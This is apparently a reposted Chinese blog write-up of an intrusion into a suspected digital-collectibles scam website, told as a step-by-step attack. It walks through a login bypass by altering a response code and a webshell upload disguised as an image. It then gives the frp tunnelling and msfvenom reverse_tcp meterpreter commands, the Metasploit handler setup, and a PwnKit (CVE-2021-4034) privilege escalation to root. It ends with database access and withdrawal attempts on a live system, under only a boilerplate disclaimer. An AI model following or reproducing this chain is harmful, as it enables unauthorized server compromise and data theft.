实战杀猪盘渗透测试
发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370
这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。 看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。 先打一波poc没有效果, 访问一下后台直接在url后面加/admin。 一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。 Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。 在爆破之前先发送到Repeater模块发送看看反应。 用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。 成功登录后台,这应该是个前端js验证非常的不安全。 尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。成功上传链接冰蝎马。 想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。./frps -c frps.ini 在内网上的kali进行设置设置配置文件将8000端口的流量转到kali的6666端口。启动客户端./frpc -c frpc.ini 生成msf木马ip和端口要填vps的msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。 打开msf进行监听 use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666exploit 运行shell.elf./shell.elf 成功返回会话。 使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。 使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。git clone https://github.com/berdav/CVE-2021-4034.git 似乎不行卡住了直接上传上去吧。 upload /home/kali/Desktop/CVE-2021-4034 /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034 返回root权限。 查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。 登进入尝试提现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。 文章来源:作者:一点我爱你110, 转载自FreeBuf.COM 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END
- 上一篇:实战 | 记一次教育src挖洞历程
- 下一篇:记一次攻防演练实战总结